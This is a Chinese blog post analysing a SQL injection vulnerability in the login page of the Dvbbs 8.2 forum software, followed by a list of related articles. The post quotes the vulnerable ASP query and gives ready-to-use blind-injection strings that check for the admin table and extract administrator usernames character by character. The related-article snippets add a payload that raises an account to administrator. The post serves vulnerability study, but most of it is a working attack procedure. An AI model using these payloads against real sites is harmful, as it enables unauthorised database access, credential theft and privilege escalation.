Dvbbs 8.2 login_sql注入漏洞探析

最新推荐文章于 2022-10-12 10:49:36 发布
最新推荐文章于 2022-10-12 10:49:36 发布
阅读量2.8k 收藏
点赞数
分类专栏: 数据库和安全 脚本网页语言安全和网站攻防 文章标签: login sql user function mobile 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2664316
版权

挺无聊的,分析下洞网/”,环境架好后.找到有问题的语句:

       End If

       Else

              username=trim(Dvbbs.CheckStr(request("username")))

              If ajaxPro Then username = unescape(username)

       End If

变量username带入到查询语句如下:

       If ChkUserLogin(username,password,mobile,usercookies,1)=false Then

              Set chrs=Dvbbs.Execute("select Passport,IsChallenge from [Dv_User] where username='"&username&"' and IsChallenge=1")

              If chrs.eof and chrs.bof Then

                     If Not ajaxPro Then

                            Dvbbs.AddErrCode(12)

                     Else

                            strString("本论坛不存在该用户名.@@@@0")'o

                     End If

                     Exit Function

              End If

              set chrs=nothing

       End If

可以看到关键的语句就是这个了:

select Passport,IsChallenge from [Dv_User] where username='"&username&"' and IsChallenge=1

来构造语句:

where' and (select count(*) from Dv_Admin)>0 and '1'='1 //判断是否存在表名Dv_Admin

此语句在查询时,就会变成:

select Passport,IsChallenge from [Dv_User] where username=’ where' and (select count(*) from Dv_Admin)>0 and '1'='1 and IsChallenge=1

先来测试一下这个语句:

先注册一用户where

在文件logins.asp用户名里填入:

where' and (select count(*) from Dv_Admin)>0 and '1'='1

在密码处填入正确密码.

点登录,如果登录正常,说明,存在表单Dv_admin,

反之,如果出错提示,证明无此表单.

依此类推,构造语句:

where' and(select count(username) from Dv_admin)>0 and '1'='1

//判断是否存在列名username

where' and(select count(password) from Dv_admin)>0 and '1'='1

//判断是否存在列名password

where' and(select top 1 len(username) from dv_admin)>10 and '1'='1

where' and(select top 1 len(username) from dv_admin)<5 and '1'='1

where' and(select top 1 len(username) from dv_admin)=5 and '1'='1

//判断username列表值长度是否大于10,小于5,等于5

where' and (select top 1 asc(mid(username,1,1)) from dv_admin)>100 and 1=1 and '1'='1

where' and (select top 1 asc(mid(username,1,1)) from dv_admin)<97 and 1=1 and '1'='1

where' and (select top 1 asc(mid(username,1,1)) from dv_admin)=97 and 1=1 and '1'='1

//判断username列表的第一位字母的ASCII码值是否大于100,小于97,等于97

where' and (select top 1 asc(mid(username,2,1)) from dv_admin)>100 and 1=1 and '1'='1

where' and (select top 1 asc(mid(username,2,1)) from dv_admin)<97 and 1=1 and '1'='1

where' and (select top 1 asc(mid(username,2,1)) from dv_admin)=97 and 1=1 and '1'='1

//判断username列表的第二位字母的ASCII码值是否大于100,小于97,等于97

…….类推

<script type=text/javascript> document.write('| 登录'); </script>
iiprogram
关注
专栏目录
动网论坛DvBBS login.asp脚本多个SQL注入漏洞
weixin_33872566的博客
08-30 193
动网论坛DvBBS login.asp脚本多个SQL注入漏洞 2008-06-02 09:26:22  标签:asp 论坛 动网 DvBBS login    [推送到技术圈] 版权声明:原创作品,如需转载,请与作者联系。否则将追究法律责任。 找了好几个地方终于弄到那个补丁程序。 动网论坛DvBBS logi...
DVBBS 8.2 漏洞利用
caiguazheng4921的博客
04-19 229
在用户名处写入“';update dv_user set usergroupid=1 where username='guest'--”密码我就用正确的来写然后写好后登陆看到反回的信息我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“guest”已经为管理员了。 现在我们已经是前台管理员了。 那么怎样才能让我们的帐户具有后台权限呢?我们继续来到lo...
Dvbbs Version 8.2.0 漏洞
热门推荐
stilling2006的专栏
07-19 2万+
影响版本: Powered By Dvbbs Version 8.2.0 Powered By Dvbbs Version 8.1.0 Powered By Dvbbs Version 8.0.0 还是批量,直接Google上面的任一 注册用户-我的主页-个人空间管理 userspace.asp?sid=0&act=modifyset 然后编辑CSS风格【一定要有看到代码才算
Dvbbs8.2 access/sqllogin.asp远程sql注入
HackCode的专栏
07-26 999
 漏洞描述:中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.aspLogin.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。漏洞等级:高危漏洞分析:password=123123&co
login.php入侵,Glossword 'login.php' SQL 注入漏洞
weixin_36391973的博客
04-12 550
发布日期:2013-02-05更新日期:2013-02-27受影响系统:sourceforge glossword 1.8.3描述:--------------------------------------------------------------------------------BUGTRAQ ID: 57732Glossword是创建和发布在线多语言字典、词汇或百科全书的系统。Gl...
dvbbs 8.2 SQL Injection注射漏洞分析
09-06
标题中的“dvbbs 8.2 SQL Injection注射漏洞分析”指的是动网论坛(Dvbbs8.2版本存在SQL注入漏洞的问题。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用应用程序对用户输入数据的不恰当处理...
动网商业版Dvbbs8.2_SQL
09-05
【动网商业版Dvbbs8.2_SQL】是一个针对互联网社区论坛的软件解决方案,它专为商业用途设计,提供了一整套强大的功能和服务。动网商业版是动网公司开发的一款经典产品,旨在帮助企业和组织搭建高效、稳定的在线交流...
dvbbs8.2_style_魔法表情
04-08
非经动网先锋书面授权许可,不得将之用于盈利或非盈利性的商业用途。 为适应实际的计算机应用环境或者改进其功能、性能,可以进行必要的修改 但不得去除动网先锋的版权标示,不得将修改后版本进行任何的商业行为。...
PHPWind_For_DVBBS_BIG5_1.0.rar_社区防护系统_防止 注入 代码
09-19
专业的过滤注入式入侵、严密高效的防护算法和监控程序构成站点严密的安全体系。 强大而完善的功能 完善的多重子版块,分版块控制生成html页面、可选用的所见即所得编辑器、防止图片和附件防盗链、多附件上传下载、...
Dvbbs7.1.0_SQL
03-18
默认管理帐号:用户名:admin,密码:admin888
localhost login 后面输入什么_什么是逻辑漏洞
weixin_39541869的博客
11-21 1877
大黑客:小v呀,你竟然在网上说自己是清华的,啧啧...ailx10:别瞎扯,你没有我的密码,不可能看到我信息!大黑客:是吗?你看看下面这个是不是你,成功!!!ailx10:谁还不能有点理想?你不也说自己是清华的嘛,哈哈哈哈嗝.......上面的场景就是典型的逻辑漏洞,大黑客和小v都可以绕过一些环节,直接查看对方的个人信息,上次还侥幸挖到一个知乎逻辑漏洞:知乎漏洞2则 。在线实验环境:http://...
Dvbbs8.1 0DAY(通杀Access和mssql版本)
6546546546456546
01-24 545
Author:Tr4c3[at]126[dot]CoMhttp://www.nspcn.orghttp://www.tr4c3.com谨以此文献给在我老婆不在身边的时候陪我YY,看AV的n37p47ch,King,慕容大雨和BK瞬间群的所有淫棍。这几天真是无聊的很啊,晚上实在不知道要做什么了,就下了套dvbbs 8.1,然后翻着玩,一不小心翻到了一个注入漏洞。看来上帝还是很可怜我的。废话不说了。看
登录页面的SQL注入漏洞
最新发布
m0_61974571的博客
10-12 3882
1、在Linux准备一套Xampp或者Phpstudy:模拟攻防2、在vscode安装Rremote Development插件,进行远程调试新添加主机 在opt/lampp/security创建项目 login.php welcome.php 二、进行登陆的渗透测试 注入类攻击的核心点: (1)、拼接为有效的代码或语句(2)、确保完成了闭合,并且可以改变原有执行逻辑通常并非处理一下就可以完成拼接和闭合,需要不停的尝试,知道出现不一样的结果。这个尝试过程建议使用python+字典快速处理上述代码一共存
动网8.2版本的注入漏洞的利用
WQ_762的博客
08-07 1037
【实验原理】 动网8.2在用户登录时,过滤不严,可以导致注入,提升权限。漏洞存在源程序的login.asp文件。 【实验步骤】 一、正常注册登录 1.1访问地址:http://192.168.1.3:8010/。 1.2 首先我们注册一个用户:san,密码:123456。 二、漏洞测试与利用 2.1 然后退出san用户,打开登录页面。 2.2使用以下语句登录:san’ ...
DVbbs8.2***思路与总结
weixin_33672109的博客
11-23 118
dvbbs8.2后比较变态,目前还没有特别好的方法,外面有人提到一种方法就是直接上传php文件或者其它服务器支持文件,这个也是一个思路,不过很多时候,单独的服务器不会支持这么多。dvbbs禁用了asp和asp.net的上传,不知道对加密后的支持不。禁用了数据库备份,换取系统的安全。 ***思路: (1)下载database默认地址: data/Dvbbs8.mdb boke/data/Dv...
JavaScript 高级
lyonte的专栏
09-09 2733
JavaScript 高级(JS 浏览器; JS Cookies ;JS 验证; JS 动画 ;JS 图像地图 ;JS 计时 ;JS 创建对象)
动网8.0最新远程注入漏洞来了
09-25 1150
此文章已发表在《黑客X档案》第9期杂志上,转载请注明出处!话说动网自从8.0版本推出来后,就很少再暴高危漏洞,累得我等菜菜面对动网8.0而束手无策!好在,老天开眼,终于又暴出了一个非常严重的远程注入漏洞,不过只限于SQL版本才有效,Access版本的不受影响。出问题的文件是Appraise.asp,该漏洞允许直接更改管理员密码,不过操作上可能会让大家觉得不太方便。为了测试漏洞的详细利用,我在本机
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值